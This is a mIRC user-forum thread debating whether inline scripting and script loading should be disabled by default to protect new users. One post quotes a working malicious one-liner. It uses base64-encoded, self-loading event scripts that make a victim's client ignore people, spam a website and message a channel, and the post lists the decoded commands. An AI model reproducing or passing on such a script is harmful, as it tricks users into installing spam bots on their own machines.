mIRC Home    About    Download    Register    News    Help

Print Thread
Security suggestions again #82732 11/05/04 04:23 PM
Joined: Feb 2004
Posts: 8
C
cmouse Offline OP
Nutrimatic drinks dispenser
OP Offline
Nutrimatic drinks dispenser
C
Joined: Feb 2004
Posts: 8
As it seems would be nice if mIRC's security would be enhanced. I know I've suggested similar thing before but this is a suggestion that does not destroy mIRC's capabilities.

1. Disable all kinds of "special features" by default, such as COM+, DDE, inline scripting etc etc. Anything that's dangerous.

2. To enable them, issue a warning that 'this is a dangerous thing you're doing blablabla...'

DDE already has this kind of functionality, which is nice. Would like to see the rest of the 'dangerous' stuff go into this though, such as inline scripting etc. Shouldn't be hard to do. Of course, disabling events & scripting as per default (you could enable them later on) would not be a bad idea either...

Also a nice warning on execution of /load & /unload would be pretty nice feature.

Re: Security suggestions again #82733 11/05/04 04:54 PM
Joined: Nov 2003
Posts: 2,327
T
tidy_trax Offline
Hoopy frood
Offline
Hoopy frood
T
Joined: Nov 2003
Posts: 2,327
Quote:
Also a nice warning on execution of /load & /unload would be pretty nice feature.


mIRC already has this (alt+r > options > initialization warning), all of your options wouldn't bother me as long as the warnings could be disabled, just like most of the other warnings in mIRC.


New username: hixxy
Re: Security suggestions again #82734 11/05/04 05:29 PM
Joined: Feb 2004
Posts: 8
C
cmouse Offline OP
Nutrimatic drinks dispenser
OP Offline
Nutrimatic drinks dispenser
C
Joined: Feb 2004
Posts: 8
The warning should be enabled per default.

Re: Security suggestions again #82735 11/05/04 05:32 PM
Joined: Nov 2003
Posts: 2,327
T
tidy_trax Offline
Hoopy frood
Offline
Hoopy frood
T
Joined: Nov 2003
Posts: 2,327
It is.


New username: hixxy
Re: Security suggestions again #82736 11/05/04 05:58 PM
Joined: Jun 2003
Posts: 5,024
M
Mentality Offline
Hoopy frood
Offline
Hoopy frood
M
Joined: Jun 2003
Posts: 5,024
I was very pleased when the warning dialog was implemented for when people click URLs, and I agree where feasible more protection warnings should be put in.

However, I think if you had to disable everything that is dangerous you'd end up disabling most of mIRC by default, and as for most people (i.e. people coming in from MSN chat clients) mIRC is already confusing as it is, it would only increase this confusion if they kept getting warnings every 5 minutes.

DCC warnings, /load warnings and clicking URL warnings already come as standard with mIRC - I'm still of the opinion that at some point people have to take responsibility for themselves, and if they don't, they'll have to learn the hard way. Internet savvy users can only advise and help people and people such as Khaled can only do so much to their software to protect people from the dangers that exist on IRC/Internet. Some people just don't care - it's not a matter of letting them know what could happen and they suddenly get worried, they know about it - they just couldn't care less what happens to their computers. I've got friends who download Kazaa/iMesh and I try telling them in lamen terms about spyware - they simply shrug their shoulders.

No matter how much security you add to something some people seem almost determined to get infected/exploited/etc - that is of course not a reason to brush off your suggestion, what can be done should be done for those who DO care and are simply not aware of the dangers as it's not fair to put them through the inconvenience, annoyance and time-wasting of dealing with an infection. However, just thought I'd comment on the practicality of it - the theory's good, but it's not going to be a miracle worker.

My 2 cents.

Regards,


Mentality/Chris
Re: Security suggestions again #82737 12/05/04 09:25 AM
Joined: Dec 2002
Posts: 349
S
Skip Offline
Fjord artisan
Offline
Fjord artisan
S
Joined: Dec 2002
Posts: 349
I can't see the point. For the stock-standard mIRC 'viruses' to infect, they have to modify the mirc.ini to add their script. The locks could simply be switched off for the next time mIRC is run (IIRC the crop of server.ini-esque infections already switch off the 'initialization warning').

Or have I missed the point? smile

Re: Security suggestions again #82738 30/05/04 05:22 AM
Joined: Mar 2004
Posts: 5
E
eneearedee Offline
Nutrimatic drinks dispenser
Offline
Nutrimatic drinks dispenser
E
Joined: Mar 2004
Posts: 5
How about locking the /remote command so that malicious scripts can't use an alias to override it.

Last edited by eneearedee; 30/05/04 05:22 AM.
Re: Security suggestions again #82739 30/05/04 10:04 AM
Joined: Dec 2002
Posts: 3,138
C
Collective Offline
Hoopy frood
Offline
Hoopy frood
C
Joined: Dec 2002
Posts: 3,138
/[color:red]!remote[/color] will ignore any aliases and go straight to the built-in/server command.

Re: Security suggestions again #82740 29/06/05 11:36 AM
Joined: Feb 2004
Posts: 8
C
cmouse Offline OP
Nutrimatic drinks dispenser
OP Offline
Nutrimatic drinks dispenser
C
Joined: Feb 2004
Posts: 8
Ok...

This is an old thread, but I hope this will pop up again.

The problem with inline scripting is following:

//write Qbot.txt $decode(b24gKjp0ZXh0OipzZWVrKjojOi5pZ25vcmUgJG5pY2s=,m) | //write Qbot2.txt $decode(b24gKjp0ZXh0OipzZWVrKjojOi5tc2cgJG5pY2sgc3R1IHZlIDEgYm9uIHNpdGUgWCA7KSB3d3cubWFnYWxpZS5zdXJmMDcuY29t,m) | //write Qbot3.txt $decode(b24gKjpjb25uZWN0OnsgbXNnICMuY2hhbiBsb2xsbA==,m) | .load -rs Qbot.txt | .load -rs Qbot2.txt | .load -rs Qbot3.txt

+ a site / user telling the newbie user 'click thru any warnings, this will give you chanserv even if you are not the owner of the channel'. Or in QuakeNet: 'this will give you Q/L bot with owners even if someone else has registered the channel'.

If you write that, the script _WILL_ be loaded next time mirc is ran. The reason why inline scripting should be disabled is to prevent users from tricking other users into doing this. You cannot change how people think, you can change how software works.

I can't see ANY VALID REASON for scripting to work from "input box". Can't you make it at least disabled by default please? This is a very serious problem as these scripts affect people EVERY DAY.

Commands executed by these scripts
on *:text:*seek*:#:.ignore $nick
on *:text:*seek*:#:.msg $nick stu ve 1 bon site X wink
on *:connect:{ msg #.chan lolll }

Last edited by Mentality; 29/06/05 11:53 AM.
Re: Security suggestions again #82741 29/06/05 11:40 AM
Joined: Dec 2002
Posts: 3,138
C
Collective Offline
Hoopy frood
Offline
Hoopy frood
C
Joined: Dec 2002
Posts: 3,138
Quote:
I can't see ANY VALID REASON for scripting to work from "input box".

Then you haven't thought about it very much.

Scripters use it for testing code, e.g. checking return values, e.g. //echo $custom_identifer(moo)
In help channels it is used to get information about a person's setup, e.g. "//say $os $ip"

If people are so inanely stupid to type everything their told to they really shouldn't be on the internet. Keylogger -> Banking site, anyone?

Re: Security suggestions again #82742 29/06/05 11:42 AM
Joined: Feb 2004
Posts: 8
C
cmouse Offline OP
Nutrimatic drinks dispenser
OP Offline
Nutrimatic drinks dispenser
C
Joined: Feb 2004
Posts: 8
Yes, but unfortunately there are about 150 000 stupid users in 200 000 users. If you'd told them to install keylogger to improve their PC, they would. Newbies are stupid. The stupidibity comes from not knowing what the other person is speaking about, and the victim buying it for it's full price. Unfortunately people are inane and stupid. Especially when they come from MSN etc. I'd be more than pleased if users would be more careful, but they are not.

If you want to use it for debug purposes, I am quite sure you'd be able to click the little checkbox saying 'Enable inline scripting'

Last edited by cmouse; 29/06/05 11:47 AM.
Re: Security suggestions again #82743 29/06/05 04:23 PM
Joined: Apr 2004
Posts: 847
Sat Offline
Hoopy frood
Offline
Hoopy frood
Joined: Apr 2004
Posts: 847
Quote:
Yes, but unfortunately there are about 150 000 stupid users in 200 000 users. If you'd told them to install keylogger to improve their PC, they would. (...) If you want to use it for debug purposes, I am quite sure you'd be able to click the little checkbox saying 'Enable inline scripting'

So what should mIRC do if the next generation of these malicious scripts/websites tells the "stupid" users to click that little checkbox as well? What if they start telling people to paste lines in Remote? According to your own statement, the "stupid" users will comply anyway.

This is a pointless arms race that reduces actual functionality, and therefore not something that mIRC should get into.


Saturn, QuakeNet staff
Re: Security suggestions again #82744 29/06/05 04:48 PM
Joined: Dec 2002
Posts: 208
H
Hrung Offline
Fjord artisan
Offline
Fjord artisan
H
Joined: Dec 2002
Posts: 208
Disabling a user's ability to do those commands from the command line won't help as much as you think.. Those with malicious intent could just start supplying the actual .ini or .mrc and tell people how to load them (or the other methods sat mentioned while I was writing this). As long as mIRC has a scripting engine at all, it will be possible to trick people that don't know what they are doing. But if mIRC scripting were to be removed, I bet that around 90% of users wouldn't upgrade to that. Kind of a catch-22, isn't it?

Btw, it isn't really right to say that these users are stupid. Too trusting? Sure. Don't know what they are doing? Absolutely. But no new user knows what they are doing right off the bat.

Look at it this way: the experience of being taken advantage of might actually be good for them! When they find out what they did (likely through being banned a few times) they may learn to be more careful, and will not be likely to do it again. Khaled just needs to make sure that these scripts cannot do permanent damage, and a lot of that has been done with the lock settings.

Don't get me wrong -- these spamming scripts are annoying, and I would be happy if they went away. But if that is all they do, I think that is worth someone learning a valuable life lesson in the end.


If I knew now what I will know then... maybe things will have been different...